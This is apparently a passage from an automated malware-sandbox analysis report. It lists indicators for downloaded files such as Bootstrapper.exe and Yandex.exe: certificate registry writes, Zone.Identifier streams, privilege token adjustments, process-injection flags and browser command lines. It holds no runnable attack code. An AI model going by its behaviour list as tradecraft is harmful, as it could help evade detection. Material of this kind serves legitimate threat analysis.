| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 040000000100000010000000e94fb54871208c00df70f708ac47085b0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b81900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b4200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\Downloads\Yandex.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 5c0000000100000004000000001000001900000001000000100000005d1b8ff2c30f63f5b536edd400f7f9b40300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b809000000010000000c000000300a06082b060105050703031d00000001000000100000005467b0adde8d858e30ee517b1a19ecd91400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b53000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c06200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df860b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000000f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c040000000100000010000000e94fb54871208c00df70f708ac47085b200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae907259b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 | C:\Users\Admin\Downloads\Yandex.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\setup.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\S0laraJFUIWHhfu4io3wh.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\BoًоtstrарреrV1.0.88.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Bootstrapper.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Yandex.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\Bootstrapper.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\BootstrapperV1.22.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection | C:\Program Files (x86)\Microsoft\EdgeWebView\Application\130.0.2849.52\msedgewebview2.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffebeb846f8,0x7ffebeb84708,0x7ffebeb84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff65a985460,0x7ff65a985470,0x7ff65a985480
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=916 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a1498d74-d423-46d4-a7f7-f43e91555a91} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2360 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6b654c4f-6754-49be-bc96-4d42f10cd07b} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3068 -childID 1 -isForBrowser -prefsHandle 2920 -prefMapHandle 3052 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0612dbf4-42ca-41d5-92e4-f6a8a630514b} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3740 -childID 2 -isForBrowser -prefsHandle 3736 -prefMapHandle 3732 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {85bb62d6-7b97-475d-8a8b-9833aea96a01} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4924 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e667d1b-ae32-423e-836f-37b2aaffc294} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5380 -childID 3 -isForBrowser -prefsHandle 5356 -prefMapHandle 5364 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {444df1b7-9ecb-4238-923c-f1968e7995c2} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5404 -childID 4 -isForBrowser -prefsHandle 5544 -prefMapHandle 5548 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f30d94a-a886-417a-b782-1727ee751ff6} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5720 -childID 5 -isForBrowser -prefsHandle 5728 -prefMapHandle 5732 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15a03c7b-e58a-49ab-b044-8cca129491eb} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4644 -childID 6 -isForBrowser -prefsHandle 5224 -prefMapHandle 5220 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c742fbc0-11b6-4140-9f15-2a4138a09c28} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
